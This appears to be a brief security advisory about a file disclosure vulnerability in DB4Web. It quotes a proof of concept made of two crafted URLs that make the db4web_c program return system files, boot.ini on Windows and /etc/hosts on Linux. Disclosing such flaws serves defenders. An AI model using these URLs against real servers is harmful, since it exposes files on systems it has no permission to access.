|
DB4Web File Disclosure Vulnerability
This issue may be exploited with a web browser. The following proof of concept has been supplied by Stefan Bogdohn: On MS Windows systems the URL to retrieve the boot.ini file would look like: http://db4web.server.system/scripts/db4web_c.exe/dbdirname/c%3A%5Cboot.ini On Linux/Unix servers the following URL will show /etc/hosts: http://db4web.server.system/cgi-bin/db4web_c/dbdirname//etc/hosts |
|
 Privacy Statement |
